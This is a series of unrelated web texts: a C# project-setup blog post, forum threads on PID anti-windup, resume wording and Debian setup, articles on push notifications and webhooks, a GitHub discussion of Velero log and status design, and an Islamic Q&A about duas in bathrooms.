To begin our little project, we need to create our initial project structure. Once that’s in place, we can create the first class from our application model. It’s frequently the case that a project directory accumulates additional stuff above and beyond the actual source code itself. For this reason, it’s my custom to carefully curate the folder structure of any project, so that things start off tidy and stay that way as the project evolves. For this project, I’m starting with two subfolders underneath the main project folder: the src folder is for all the projects that make up deliverable components of our application. In this case, we’re starting with just a single project. The tests folder is for all our test projects, keeping the tests nicely segregated. You can see here the WordTutor.Core.Tests project, which will contain all the unit tests for the WordTutor.Core project. The .vs folder is a working folder for Visual Studio Code, and the .git folder contains our git repository. Both can be ignored. One thing I’m really appreciating with .NET Core is the new project structure - all of the repetition and boilerplate from the old .csproj files has gone. Check it out - here’s the entire file for WordTutor.Core.csproj. Here, we’re targeting .NET Standard 2.0 for maximum compatibility. Good practice is to target .NET Standard where possible - and the lower the standard you use, the wider the potential for reuse. Though, this is because lower versions are more restrictive, so it’s a balancing act. The project file for WordTutor.Core.Tests.csproj is a little more complex, due to project and package references, but it is still far easier to read than the older style: This time, the project targets an actual runtime, necessary for execution of the unit tests.
Neither project explicitly references any .cs source files - inclusion is now automatic, with a couple of benefits: there is a reduced chance for conflicts when adding additional source files, and it also encourages a tidy codebase where extraneous source files (debris left over from earlier efforts) are cleaned up as they arise. Modelling a single word To encapsulate each individual spelling word, we have the immutable class VocabularyWord. Here’s an abridged view of the important details: We begin with the essential properties for the word - how to spell it correctly, how to say it correctly (because sometimes a speech engine doesn’t say things the way we expect), and a sample phrase to give the word in context. For simplicity, we initialize a word with just a spelling, and then we have some transformation methods that each return a new instance with the required change. This is a little bit wasteful, creating heap debris, but we’re looking at an interactive application here, not a server, so the simplicity of design is likely worth the performance cost. The key that makes these transformation methods work is a private constructor that allows creation of a near-clone of an existing word: Each parameter has a null default, and if not provided, the matching property from original is used instead. This is possible because null isn’t a permitted value for any of the properties. There’s nothing particularly novel about the implementations of GetHashCode(), but they’re included for completeness: The testing of VocabularyWord is pretty straightforward, so I’ll leave it to you to check out the code for yourself. In the next post, we’ll look at collecting many words together into a VocabularySet and explore how to transform an immutable collection.
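The pattern described above might be sketched like this; the member names and exact shape are my guesses from the post's description, not the actual WordTutor source:

```csharp
using System;

public sealed class VocabularyWord
{
    public string Spelling { get; }       // how to spell the word correctly
    public string Pronunciation { get; }  // how to say it (for the speech engine)
    public string Phrase { get; }         // a sample phrase giving the word in context

    // For simplicity, a word is initialized with just its spelling
    public VocabularyWord(string spelling)
    {
        Spelling = spelling ?? throw new ArgumentNullException(nameof(spelling));
        Pronunciation = string.Empty;
        Phrase = string.Empty;
    }

    // Private near-clone constructor: any parameter left null
    // falls back to the matching property of 'original'
    private VocabularyWord(
        VocabularyWord original,
        string spelling = null,
        string pronunciation = null,
        string phrase = null)
    {
        Spelling = spelling ?? original.Spelling;
        Pronunciation = pronunciation ?? original.Pronunciation;
        Phrase = phrase ?? original.Phrase;
    }

    // Each transformation returns a new instance with one change applied
    public VocabularyWord WithSpelling(string spelling)
        => new VocabularyWord(this, spelling: spelling);

    public VocabularyWord WithPronunciation(string pronunciation)
        => new VocabularyWord(this, pronunciation: pronunciation);

    public VocabularyWord WithPhrase(string phrase)
        => new VocabularyWord(this, phrase: phrase);
}
```

Note that the null-coalescing fallback works only because null is never a legal value for any property, so null can safely mean "keep the original".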
Where to put the PID windup guard? Should I put a windup guard on each term of the PID, or just the I, or maybe the whole output? Windup is mostly an issue of the integral term. If you are getting windups from other terms, these are probably not designed properly. The I term only. Switch its input to zero when it just enters saturation @Chu If you switch its input to zero, it will never go down. @EugeneSh. I'm not sure if "windup" is the correct official term, but in some circumstances plant states can get out of hand. In my experience it's been mechanical assemblies driven by torquer motors, putting the traveler into a combination of velocity and position such that even at maximum braking torque it'll whack into a stop. @TimWescott I would call it a general instability. Can be caused by integrator windup of course. @EugeneSh. In every way that I've seen instability defined in academic works, what I described isn't instability. The system is perfectly stable (especially if the whole mechanism gets jammed up when the stop breaks off and sticks things up -- been there, done that), but it's severely misbehaving even so (unless your design intent is to break things). @EugeneSh. ... implicitly: and back on again when its input is in the permitted region. Clearly it can't be 'off' for evermore. Integrator anti-windup is a measure you need to take because of output saturation or other limits in the system, and such limits are nonlinear behavior. When you start doing nonlinear control, a lot of the nice, clear, procedural things that we're taught in undergraduate control theory classes don't entirely apply. In general you should apply integrator anti-windup to just the integrator term, although you may also need to apply limiting to the output term before it's applied to a DAC (assuming you're doing the work in software). There are a lot of ways to do this.
My preference is to either limit the integrator state to certain bounds by itself:

// (Calculate integrator_state)
if (integrator_state > integrator_max) { integrator_state = integrator_max; }
if (integrator_state < integrator_min) { integrator_state = integrator_min; }

Or to calculate a candidate output, then trim the integrator state:

output_candidate = integrator_state + error * prop_gain;
if (output_candidate > output_max) {
    integrator_state = output_max - error * prop_gain;
} else if (output_candidate < output_min) {
    integrator_state = output_min - error * prop_gain;
}
// Re-calculate the actual output, possibly with a D term

The method that @Chu mentions would work, if you remember to only apply it when the integrator is being pulled to excess, not pulled back (but my first method is equivalent). Another method that is used often is to hold the integrator term at zero when the error is large, then allow integrator action when the error gets below some threshold, or if you're doing a motion controller that knows when a "move" starts, to set the integrator to zero at the start of a move and hold it there for some finite time. I'm not a big fan of either of those methods, but others are. Because you're venturing into nonlinear control, even if you're so far in the shallow end of the pool you can lie down without drowning, there are options on options on options, and there's no one right way to do it. Moreover, you can't find an answer by analysis -- you have to either implement the real system and give it a whirl, or make a simulation and try your algorithm out on that. I have opted for your first solution, and will try it out tomorrow. It's just a heater control with no safety critical features You may find this article useful. Note that the model of a heating system in there is completely fake; you probably don't want to use it in your work. What you'll find useful is the code, and the discussion of integrator windup.
Tim's article has been fundamental to my understanding of controls. It is well worth the short read and will help out immensely! I highly recommend it. Thank you @TimWescott!

@DrewFowler: I thought I recognized that code. The young Padawan meets his master.

The windup guard typically protects the integral term so that it does not accumulate without limit. The controller can overshoot significantly, and will continue to overshoot while the integral keeps growing. The windup guard therefore applies to just the integral term, since that is the term that can "wind up" and keep growing. But the output of a PID can, and should, be limited as well. For example, the following code calculates the integral term and then limits it to a set value. It also limits the output of the controller, according to a different limiting term.

void PID_Compute(PID *pid)
{
    // Find all error variables
    pid->lastError = pid->error;
    pid->error = pid->setpoint - pid->input;
    pid->derivative = pid->error - pid->lastError;
    pid->integral += pid->Ki * pid->error;

    // Anti-integral windup
    if (pid->integral > pid->IntegralLimit) {
        pid->integral = pid->IntegralLimit;
    } else if (pid->integral < -pid->IntegralLimit) {
        pid->integral = -pid->IntegralLimit;
    }

    // Calculate PID output
    pid->output = (pid->Kp * pid->error) + (pid->integral) + (pid->Kd * pid->derivative);

    // Set output limits
    if (pid->output > pid->Outmax) {
        pid->output = pid->Outmax;
    } else if (pid->output < pid->Outmin) {
        pid->output = pid->Outmin;
    }
}

For anything pertaining to writing or understanding a PID controller, refer to Tim Wescott's article.

As others have already said, windup is only a problem for the I term. Where I differ from almost everything else that I've seen is that I don't like to arbitrarily limit my I term. I want it to be able to saturate the output no matter what it takes to do that, but there's no point in going beyond that. So my limits are floating, based on the final output.
So I use a bigger datatype to hold the output than what I actually need, so I can detect out-of-range and clamp it. Then as part of that clamp, I also unwind the I. For one project, I actually back-calculated what it should have been to saturate exactly, but for another, I just switched on an exponential decay:

I_acc += Error;

// other code here

if (OUTPUT_OUT_OF_RANGE()) {
    CLAMP_OUTPUT();
    // anti-windup
    I_acc -= (I_acc >> 2);
}
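The exponential-decay unwind in that last snippet can be sketched in Python for illustration (names invented; the integer shift `I_acc >> 2` is written as `// 4` here, which matches for non-negative accumulators). While the output stays out of range, the accumulator settles at a finite value instead of ramping forever:

```python
def unwind_step(i_acc, error, output_in_range):
    """One integrator update with exponential-decay anti-windup.

    Sketch of the approach above: integrate normally, but while the
    output is saturated, bleed off a quarter of the accumulator each
    cycle (the C version's I_acc -= (I_acc >> 2)).
    """
    i_acc += error                  # normal integration
    if not output_in_range:
        i_acc -= i_acc // 4         # anti-windup: geometric decay while clamped
    return i_acc
```

Driven with a constant error of 100 while saturated, the accumulator converges to a fixed point of 300 rather than growing without bound.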
STACK_EXCHANGE
Enjoys his fair share to work hard and smart to meet commitments

Received a resume lately. One of the sentences, in the summary section, doesn't look right to me. It may not be a very obvious mistake, or it may not be a mistake at all. But I can't say anything for sure, as I am not a native speaker, nor do I find myself eloquent in writing English.

.... blah blah. A reliable team member who gets work done and enjoys his fair share to work hard and smart to meet commitments. blah blah ....

Now, if you asked me to correct it (because I think it's not well written), I would make something like the below, using the same words without trying to make it spiffy:

.... blah blah. A reliable team member -- very smart to meet commitments, who gets work done and enjoys his fair share in working hard. blah blah ....

What do you folks think? Is there something wrong with the original sentence structure?

I made a few edits to the question; EL&U should not be used for questions on how to improve one's English (see the FAQ). However, since it did contain a real question about a certain grammatical construction, I am leaving the question open with some extraneous stuff edited out.

Here's my suggestion: So and so is a reliable team member and does his fair share of hard work to meet commitments. I haven't used 'gets work done' because 'reliable' carries the connotation that he will get the job done. Others may disagree, saying that reliable means other things, like getting to work on time, etc. However, you can still include that phrase if you want to. If you want to include 'smart' in there, you might have to rephrase things, because in English usage people usually work hard or work smart; 'working smart' carries the connotation of not having to work too hard to achieve something. So, you could write: So and so is a reliable team member who works hard and has shown aptitude and diligence in meeting commitments. Aptitude replaces smart and diligence replaces hard(-working).
The above sentence is more formal (or stuffy), depending on how you see it. If it's not quite what you're looking for, then how about: So and so is a reliable team member who works hard, works smart and meets commitments. Or: So and so is a reliable team member who works both hard and smart to meet commitments. The bottom line is that your example can be rewritten in several ways, but perhaps to simplify matters, think about what you want to say and the tone you wish to convey it in, then write the sentence as correctly as you can. It's always best to write simply, after which you can embellish your sentence, if you wish. Thanks and hope this helps.

'Deadlines' and 'objectives' are better word choices than 'commitments', as mentioned by smirkingman. Without more info, 'commitments' sounds more like things you do for your family.

A reliable team member who gets work done and enjoys his fair share to work hard and smart to meet commitments.

This sounds terribly like a direct translation from another language. It bothers me on several counts: "his fair share to work hard" should be something like "his fair share of hard work". "and smart to meet commitments" (methinks Google Translate?). Does he smart (go red in the face) when he meets commitments? Is he smart (clever) enough to meet commitments? Did he smartly (quickly) meet (encounter) a commitment on his way to work? Or, almost ridiculously, is he smart (clever) enough to meet (face to face) commitments rather than delivering what's promised? Stringing more than two phrases together with ANDs (and enjoys, and smart) is clumsy. We all get the gist of 'meeting a commitment', but here commitment is nothing but waffle-speak for a deadline or an objective.
Let's analyse what he's trying to say: He's a reliable team player. He works hard and takes his fair share of the workload. He meets his commitments (in some, yet to be understood, positive fashion). From which we can cobble something more concise and distinctly more palatable, for example: John is a reliable, hard-working team player who consistently meets his objectives.

Small correction: "what we think he's trying to say" (we, because I do think so too). We don't know that's what he's trying to say.

Thanks, smirkingman, for all your opinions and suggestions. +1

Two things: "enjoys his fair share to work hard" sounds weird to me; I expect people to do their fair share. And the sentence doesn't have a verb (it's a nominal sentence); while that's becoming more common, especially in informal writing, I don't consider it good writing style unless you're describing a process of thoughts, for example.
STACK_EXCHANGE
Re: What is pbbuttonsd used for nowadays? On 31. jan.. 2009, at 22.20, Stefan Monnier <firstname.lastname@example.org>

E.g. is pbbuttonsd's cpu throttling similar to what cpufreqd/ do, or does it work differently? What about the comparison with the kernel's "ondemand" scaling governor (tho this doesn't work on my machine, so it's maybe not a relevant question)? What happens if two of them are installed at the same time?

Non issue, leave it to the kernel

I do not know what you mean. Are you saying "pbbuttonsd's cpu throttling functionality is useless, use the `ondemand' governor and let the kernel take care of it"?

No, not useless. Still, I like easy, and functions further up the tree, if you catch my drift.

If so, it doesn't apply to the G4, since the G4 isn't able to switch frequency quickly enough for the kernel's scaling governors to be

Ok, i'll be sure to let my computer know that.

How does pbbuttonsd's hard-disk power save compare to the usual

Also a kernel thingy

Actually, not only: the kernel provides ways to save power, but how and when to use them is generally under the control of userspace tools.

You sure want to confuse the discussion with minor importances. Want to discuss X's mouse handling too?

But IIUC you're saying that pbbuttonsd's hard-disk power saving functionality is made redundant by laptop-mode?

No. I still like easy, and functions to be handled as early as possible, making me run fewer annoying programs and daemons.

Is it also the case that pbbuttonsd makes laptop-mode redundant?

Now you are fetching straws to discuss boring subjects

For someone like myself who uses Debian on a variety of platforms,

For the sake of EASY handling of button functions... There shines

help me figure out how best to adapt my generic Debian config.

I believe you. But I don't know what "buttons" you're talking about, nor do I know what their "function" is. And I'm not even sure what you mean by "EASY" (tho I guess you mean "without any manual configuration").

Manual configuration is ok.
Still, changing the light with proc or whatever, with numbers 1-255, is kinda stupid. Btw, now you come out as somewhat a bit dense. You've read the posts on this current topic you started? apt-get install pbbuttonsd once is easy, and every little marking and symbol on my keyboard works.
OPCFW_CODE
Re: Initial Load, X Issues

Don't use dselect. You can use dpkg. Go to the path where your .deb resides and do:

dpkg -i name_of_the_deb_package.deb

>but it doesnt seem to support my newer TNT2.

Whether support is trouble-free or takes some work depends on which version of Debian you're using, old or new. The people from NVIDIA (TNT) have provided some stuff for GNU/Linux on their homepage, near the M$ Win drivers. Go and take a look there.

Other questions... Don't know (I'm also a Debian and GNU/Linux newbie). Hope you convert to Debian and enjoy it. Hope that helps,

At 16.48 7/7/00 -0400, Ethan Pierce wrote:

>Greetings all, I have just installed Debian via the apt method. I'm not even sure what this did, but it seemed to go right into the compilation, whereas dselect from the cdrom was near impossible for me to figure out. Anyhow, while it was compiling it kept asking me if I wanted this WM or that; I was waiting for enlightenment to show up, so I kept saying NO (apparently E doesn't come with 2.1). So now everything is installed, I'm on the net and in a console.

>A few questions:

>1) How should I go about getting X working? I understand how to use xf86config, but it doesn't seem to support my newer TNT2. I have the XFree86 4.0 DEB package and I definitely want to install that. Where do I put it to have dselect recognize it? Or should I compile X 4.0 from source?

>2) How do I get my window manager working when/if I get X running correctly? Is it just a simple matter of editing .xinitrc in my home dir?

>3) I want the enlightenment WM. I used it before in Mandrake, but could never compile it from CVS because of the way RPMs are strewn about the system in Mandrake. I've been told that getting E through CVS in Debian was a snap. Any tips on this?

>4) Lastly, I want to upgrade the kernel. Should I do that first before anything else? I am familiar with this process.

>Thanks for your help guys. I'm coming to Debian because it was highly recommended to me and well maintained.
>I dislike the way Mandrake scatters files and packages about the system in disorganization. Please help me convert to Debian. Appreciations, Ethan

\______| els fills abandonats |_______/
OPCFW_CODE
Push notifications allow an app to inform its users of new events or messages without their needing to actually open it, similar to the way a text message plays a sound and pops up on your phone's display. This is one of the great ways for apps to interact with users on your desktop. In addition to pushing messages to the screen, it allows apps to put a "badge" on the app's icon: e.g. the email icon will show the number five when there are five unread messages.

Here is the perfect use case for this: let's suppose you're playing chess with your friend online. While you're in the app, your friend's moves show up on the board straight away. But when you switch to another app, e.g. to read email, and your friend decides where to move, the app needs a means to inform you that your friend has made a move.

Here are some tips which could help you when working with push notifications:

It's mandatory for an app to register with the server (e.g. APNS for iOS, the GCM server for Android, MPNS for Windows, and so forth) in order to receive notifications. It can then pass its provider a device token it receives from the OS.

Notifications can be a message, an upcoming calendar event, or fresh data on a remote server. They can display an alert message, or they can badge the app's icon. They can also play a sound when the alert or badge number is shown. Choose the sort in accordance with your need.

Refrain from using multiple notifications for similar activities (e.g. in a chat room app, the user might want a notification only when the conversation is first established; it is not necessary to present a notification every time a message is received).
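As a concrete sketch, a notification payload carrying an alert, a badge count, and an optional sound could be assembled like this in Python. The field names loosely follow common provider payload shapes but are illustrative only; APNs, GCM/FCM, and MPNS each define their own schema:

```python
import json

def build_push_payload(device_token, title, body, badge=None, sound=None):
    """Assemble an illustrative push message as JSON.

    The structure is a sketch, not any provider's exact schema; check
    your provider's documentation for the real field names.
    """
    notification = {"title": title, "body": body}
    if badge is not None:
        notification["badge"] = badge   # e.g. the unread count shown on the app icon
    if sound is not None:
        notification["sound"] = sound   # played when the alert is shown
    return json.dumps({"to": device_token, "notification": notification})
```

In the chess example above, the app would send such a payload only when the user has switched away, per the tip about avoiding redundant notifications.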
Be careful with excessive use of Android push notifications, as repetition will lead to spamming, which may result in the user unsubscribing from your application.

Always select a service provider who provides cross-platform service for your app's notifications. This will cut the effort of determining the kinds of devices your app's users are on: e.g. if your app runs on two platforms, such as Android and Windows, the provider can offer you a way to send messages to both platforms from one API call.

A couple of restrictions you should keep in mind: with some service providers, devices aren't able to handle multiple push notifications for a single app. In that event, a great deal of the push messages sent to the app will be queued, and only the most recent notification will be shown on the screen.

Delivery of push notifications is not guaranteed. The push notification service includes a feedback service which the host (APNs) constantly updates with a per-application list of devices for which there were failed delivery attempts. So using push notifications for realtime applications isn't viable.

I think the open rate for business apps is higher: as a business owner, when you send out a push notification to your visitors, your visitors are much more targeted, and you can be specific about exactly what they may want to read, like a special offer. From my experience with apps that I have built, the proportion of downloads is higher when you give a coupon or discount. This is advice I like to show business owners, as it exhibits what the customer is searching for. I also found that downloaders don't value the look and feel of the organization; they want a quick way to call and a quick means to know the location.
Here is what apps can offer.
OPCFW_CODE
Consider consolidating per-restore logs into a single file? (Similarly for backups) Right now, for restores, we log: validation errors into the restore API object (.status.validationErrors) info-level logs to -logs.gz in object storage, using logrus warnings/errors to -results.gz in object storage, as JSON We follow a similar pattern for backups, except we don't have the third item (yet). I wonder whether it would make sense to consolidate this down into just a single per-backup/per-restore log file (e.g. -logs.gz). Since we're now using logrus, we have the ability to use differing log levels as well as other structured logging fields to differentiate between different types of log output. The main benefit that I see of consolidating is that a user now only needs to look in a single place for the full set of results from a backup or restore. So, for a restore: We could retain the view that we currently provide in ark restore describe by adding logic to that command to parse the log file and separate out the log statements into different sections within the command output. Interested to see if other folks think this makes sense/is useful. @jbeda this is an item we'd like to discuss soon My read on this would be that this is an internal or developer focused improvement. Would this add any value for end-users? I'd also like to raise a discussion on prioritization for this. @ncdc I see you made it P1 - would love to know more, or we can discuss in the context of the larger 1.0 roadmap planning. Would this add any value for end-users? Currently, end users asking for help have to look in the 3 locations specified to see the full picture of what happened if a backup or restore didn't work as expected, so I'd say it does have end user impact. Ah - I understand now. Thanks @nrb. So I'm lumping this under UX / debuggability. 
Related to #305. Summarizing the discussion from above, here's my straw-man proposal:

Backups and Restores use the following phases:

New: the object has not yet been processed by the Ark server
Processing: the object is currently being processed by the Ark server
Processed: the object has been processed by the Ark server and has reached a terminal state (e.g. for backups, everything that could be backed up was backed up and the tarball/etc have uploaded to object storage; for restores, everything that could be restored was restored and the log has been uploaded to object storage)
Failed: there was a fatal error preventing the object from reaching a normal terminal state (e.g. there was an error uploading the tarball/logs to object storage)

WarningCount and ErrorCount fields are added to the status for both Backups and Restores to store counts of the warnings/errors logged during the backup/restore; backups and restores can now be displayed in ark backup get / ark restore get as e.g. Processed (2 warnings, 1 error)

ark backup describe and ark restore describe display warning/error counts by default. If --details is specified, the per-item log is fetched from backup storage, and the warning/error lines are displayed as part of the output

For both Backups and Restores, validation errors (i.e. .status.validationErrors) go away; any information currently reported as a validation error gets logged at error level to the per-item log file, and instead of using the FailedValidation phase, objects will be Processed with >0 errors.

FailureReason field is added to the status for both Backups and Restores, to provide the user information about why their backup/restore is Failed rather than Processed (this is particularly useful for when the log fails to upload, and the only other place that errors can be logged currently is to the server log)

All comments welcome -- just wanted to get a draft proposal out!

This proposal makes sense to me.
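To make the proposed ark backup get display concrete, the phase-plus-counts column could be rendered with logic like the following. This is a hypothetical sketch of the display format described above, not actual Ark/Velero code:

```python
def summarize(phase, warning_count, error_count):
    """Render a status line like 'Processed (2 warnings, 1 error)'.

    Sketch of the proposed `ark backup get` / `ark restore get` column;
    names and format are illustrative.
    """
    parts = []
    if warning_count:
        parts.append(f"{warning_count} warning" + ("s" if warning_count != 1 else ""))
    if error_count:
        parts.append(f"{error_count} error" + ("s" if error_count != 1 else ""))
    # With no warnings or errors, just show the bare phase
    return f"{phase} ({', '.join(parts)})" if parts else phase
```

This keeps the counts next to the phase, so a user scanning the list immediately sees whether a Processed object finished cleanly.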
I think FailureReason for cases where the failure is to upload a log makes a lot of sense in terms of visibility.

One thing I'm still thinking about is how to make it more clear that a backup that's failed validation has no data uploaded to object storage. E.g. a backup with a single validation error that therefore never backed up anything might be displayed as Processed (1 error), which could be the same as for a full-cluster backup that got one error backing up a single PV. We could:

keep FailedValidation as a phase
FailedValidation -> Failed, rather than Processed
store a count of objects backed up as a summary stat on the API object and display it, e.g. Processed (0 items backed up, 1 error)
something else

FWIW - was thinking about https://github.com/heptio/velero/issues/286#issuecomment-440386348 again, and I think FailedValidation should become Failed (rather than Processed).

So, after starting to dig into this, I realized that this could turn into a pretty big ugly PR if tackled wholesale. I thought about how to break it down and here's what I came up with:

For v1.0:

[ ] move RestoreResult https://github.com/heptio/velero/blob/master/pkg/apis/velero/v1/restore.go#L118 out of the API package, since it's not actually part of the API, just a struct that gets JSON'ed and uploaded to object storage. This frees us up to drop it in a 1.x release.
[ ] in velero restore describe, show warning/error counts right next to the status (so it'd show something like Phase: Completed (2 errors, 1 warning)). Possibly also update velero restore get output to combine the phase/warnings/errors columns.
[ ] add Warnings and Errors count fields to Backup's status to be consistent with Restores.
[ ] make Backups consistent with Restores re: whether it ends as Failed or Completed. Failed should mean "failed to start" or "failed to upload tarball", whereas Completed (with errors) would mean individual items failed to back up.
For v1.x:

[ ] enhance velero backup describe or velero backup logs to more easily view errors, by adding filtering, grouping, formatting. Do this for backups first, since we already have leveled logs.
[ ] drop the RestoreResult type for restores, move warning/error reporting into the restore log, and enable them to be shown in the same way as for Backups

For v2.0:

[ ] Once all of the above is working well, drop the ValidationErrors field on Backups/Restores (these will go into the log as regular errors), and drop the FailedValidation phase (this will become Failed).

@nrb @carlisia does this seem reasonable? I tried to focus v1.0 work on (a) making things consistent between Backups/Restores so it's more obvious for the user, and (b) setting us up for making additional changes later.

@nrb @carlisia would appreciate any input you have on the above - I'd like to get started on this soon.

I'll look at it in a little bit. You didn't mention FailureReason, does this no longer make sense to add? It sounded like a good idea.

I like this proposal as is. I especially like rolling FailedValidation into the Failed phase. Ultimately, I think the priority should be to have one phase that unequivocally means "success". If this is Processed, then we definitely should go for "FailedValidation -> Failed, rather than Processed". And I don't think it hurts if this change gets postponed to v2.0.

I'm confused about Completed (2 errors, 1 warning). How does Phase: Completed relate to Phase: Processed? I found Completed in the code but am having trouble finding Processed. In addition, in the code it says BackupPhaseCompleted means the backup has run successfully without errors, but your proposal says to display Phase: Completed (2 errors, 1 warning) in describe. If there are errors, how could it be Completed? I'm asking to make sure we don't have a discrepancy in meaning with our phases, but also for my understanding.
Other than that, though, I like it that you broke out part of this effort into future releases, that is great. 👍

For the v1.0 milestone, how does the user then get this combined stream? velero restore logs? So describe only displays counts and no other information? Let's chat about this in person next week, I think some discussion will be helpful.

@carlisia @nrb responses to your comments. We should still discuss in person.

You didn't mention FailureReason, does this no longer make sense to add? It sounded like a good idea.

Yeah, this still makes sense, and can be added for v1.0.

For the v1.0 milestone, how does the user then get this combined stream? velero restore logs? So describe only displays counts and no other information?

Based on the latest proposal, not much changes for v1.0 in terms of seeing the results. velero restore logs plus velero restore describe would still be used to see the overall picture. The work to combine into a single stream would be done in a v1.x.

Per https://github.com/heptio/velero/issues/286#issuecomment-479014480, the main work item that I actually want to tackle for v1.0 is deciding on the semantics of Completed vs. Failed, and then making it consistent across backups + restores. Specifically: does Completed (or Processed) mean "Completed with no errors"? Or can it mean "Completed with some errors backing up/restoring individual items"? Conversely, does Failed mean "There were >0 errors encountered during backup/restore"? Or does it mean "Fatal error, such as unable to upload/download backup tarball"? We could also decide to go to Completed, CompletedWithErrors, and Failed as the phase set, to differentiate.

I like Failed as "fatal error, couldn't perform a key operation to start the restore," and CompletedWithErrors or PartialCompletion for a restore where some resources can't be restored.
The overlap I see there is: if we failed to restore anything into k8s, but Velero's own operations had no error, is that Failed, or CompletedWithErrors/PartialCompletion? If the number of artifacts restored == 0, I could see how the latter would be confusing. For me it hinges on how useful the output of a CompletedWithErrors restore would be. If it's 100% unusable, then it should be a plain Failed. I suspect there's a spectrum, and maybe we can't even detect that.
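One way to pin down the Completed / CompletedWithErrors / Failed semantics debated above is a small decision function. This is a hypothetical reading of the thread, not project policy:

```python
def final_phase(fatal_error, item_errors, items_done):
    """Map backup/restore outcomes to a phase.

    Hypothetical semantics: Failed = a key operation broke (couldn't
    start, or couldn't upload the tarball/logs); Completed = zero item
    errors (the one phase that unequivocally means success);
    CompletedWithErrors = partial success. Zero items done with errors
    is treated as Failed, per the "if 100% unusable" comment above.
    """
    if fatal_error:
        return "Failed"
    if item_errors == 0:
        return "Completed"
    if items_done == 0:
        return "Failed"
    return "CompletedWithErrors"
```

The `items_done == 0` branch is exactly the overlap case raised in the last comment: every item errored, so nothing usable was produced even though Velero itself ran cleanly.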
GITHUB_ARCHIVE
Is it haram to hang duas, or an ayah, on the bathroom wall (i.e. in a picture frame)? When entering restroom facilities, it is nice to be reminded of the many sunnahs that relate to using the bathroom, hygiene, etc. But is it haram to have a framed dua or Quranic verse hanging on the wall (in a picture frame)? Thank you in advance. Wasalaam.

Can you elaborate on what you exactly mean by 'hanging a prayer'? I.e. a framed Arabic prayer

I guess that means "hanging a Qur'an verse in Arabic" or "hanging a dua in Arabic"; it doesn't make sense to "hang a prayer" (which is an action involving recitation, prostration, etc.).

@RebeccaJ.Stones I edited it. Sorry I was not clear. Let me know if I should edit it any further.

It would be better if one would learn the prayers (duas) by heart and practice the sunnah. Over time it will become second nature, and you will need no external form of reminder. Below is a Hadith that prohibits prayer (salaat) in a bathroom, but its classification is Da'if (weak):

It was narrated that Ibn 'Umar said: "Allah's Messenger prohibited prayer from being performed in seven places: The garbage dump, the slaughtering area, the graveyard, the commonly used road, the bathroom, in the area that camels rest at, and above the Ka'bah." Sunan Ibn Majah 746

Also, as per Fathul Bari vol.1 pg.197; Daarul Qur’aan: If a person forgets to read the Du’aa before entering the toilet, then the Du’aa should be read in one’s heart, not on the tongue. However, if the toilet and bathroom are combined, then before entering the actual place of toilet, one may read the Du’aa verbally, on condition one is not unclothed.

I don't see how this answers the question "is it haram"; I can only see how it answers "is it the most recommended course of action".

@G.Bach honestly you are correct. I accepted the answer because Ahmed put a lot of effort into it. Perhaps that was not the wisest decision. Ahmed, would you be able to confirm this as halal or haram? Jazak.
Hanging ayahs or duas on the walls in general is contrary to the practice of the Prophet (SAW) and the Khulafaa’ al-Raashidin (RA), who never did such a thing. The best way is to follow them and not to introduce bid‘ah. Since it was never a practice, there are not many Hadiths that talk on the subject directly. You can further deduce the ijtehad on the practice w.r.t. the washroom. Please also visit this link, which has a response by Sheikh Muhammed Salih Al-Munajjid: https://islamqa.info/en/254 ... And Allah knows best and we pray to Him to guide us to the straight path. Ameen.

Thank you Ahmed. I’m assuming this does not apply to the masaajid, as they are commonly decorated internally with duas and verses. Wasalaam.

The moderators on this forum advise us against asking multiple questions in a single query and also tend to move comments to the chat section at times. Hence, I'd advise you to post that as a separate question to help other members too :)

@Ahmed my question asks about bathroom walls specifically. Your comment above refers to walls in general, which shifts the conversation.

@Ahmed "Hanging ayahs or duas on the walls in general is contrary to the practice of the Prophet (SAW) and the Khulafaa’ al-Raashidin (RA), who never did such a thing." So is driving a car, or drinking a chai latte. That doesn't show it's haram.

@G.Bach In Islam, bid‘ah refers to innovation in religious matters.

@Ahmed Your answer says nothing about bid‘ah; if your answer is "it's haram because it's bid‘ah", your answer should reflect that.

@G.Bach One cannot label a practice that was non-existent at the Prophet's time as either halal or haram if not alluded to by the Quran or the Prophet. The ulema, through ijtehad, will classify such practices as either mustahab, mubah or makruh.
@G.Bach In my answer, I have provided references that state that it is mustahab (recommended) to read the duas before entering the toilet. Also, in my earlier comment I have provided a link that refers to a fatwa by Sheikh Al-Munajjid w.r.t. hanging Quranic verses on walls in general. It can be deduced that if it is considered makruh to hang these in a normal place of stay, like the bedroom or hall, which are considered clean and pure, then it would be more disliked to do the same in a toilet, which is relatively unclean and impure.

@G.Bach If you have a different opinion, please do feel free to enlighten us. We all learn through sharing on this forum. :-)
STACK_EXCHANGE
How To Create Webhook – Product Automation Platform

I saw the webhook mentioned in the app settings and wondered if it's something I should use. In short, the answer is probably yes.

Webhooks are one way that applications can send automated messages or information to other applications. It's how PayPal notifies your accounting app when a customer pays, how Twilio routes your phone calls, and how WooCommerce notifies you of a new order in Slack.

It's a simple way for your online accounts to "talk" to each other and automatically notify you when something new happens. In most cases, you need to know how to use webhooks if you want to automatically push data from one application to another. Learn how webhooks talk in detail, and let your favorite apps talk to each other.

There are two ways apps can communicate with each other to exchange information: polling and webhooks. As one of our customer champion friends explained: polling is like knocking on your friend's door and asking if they have sugar (also known as information), but you have to go and ask for it every time you want it. A webhook is like your friend throwing a bag of sugar over to your house whenever they buy some. No need to ask for it.
The data is pushed automatically whenever something new happens. Webhooks are automated messages sent from apps when something happens. They carry a message, or payload, and are sent to a unique URL, which is essentially the app's phone number or address. Webhooks are almost always faster than polling and require less work on your end.

It's a lot like an SMS notification. Say your bank sends you an SMS when you make a new purchase. You already gave the bank your phone number, so the bank knew where to send the message. It types out "You spent $10 at NewStore" and sends it to your phone number.

Here's an example message for a new order: Bob opened your store's website, put a $10 item into his shopping cart, and checked out. Boom, something happened, and the app is about to tell you about it. Time for a webhook.

Wait: who is the app calling? Just as a bank needs your phone number before it can text you, with a webhook you need to tell the originating app (in this case the ecommerce store) the receiving app's webhook URL, and what data to send. Let's say you want to create an invoice for this new order. The application that generates the invoice is on the receiving end; it's the application that needs the order data.

First, open the Invoices app, create an invoice template, and copy its webhook URL (e.g. yourapp.com/data/12345). Then open your ecommerce store app and add that URL to its webhook settings. That URL is basically the phone number of the invoicing app. If another application pings that URL (or if you typed the URL into your browser's address bar), the application will see that someone is trying to send it data.

Back to the order. The ecommerce store knows it has received an order and needs to send the details to yourapp.com/data/12345. It writes the order data in a serialized form. The simplest of these formats is called "form encoding".
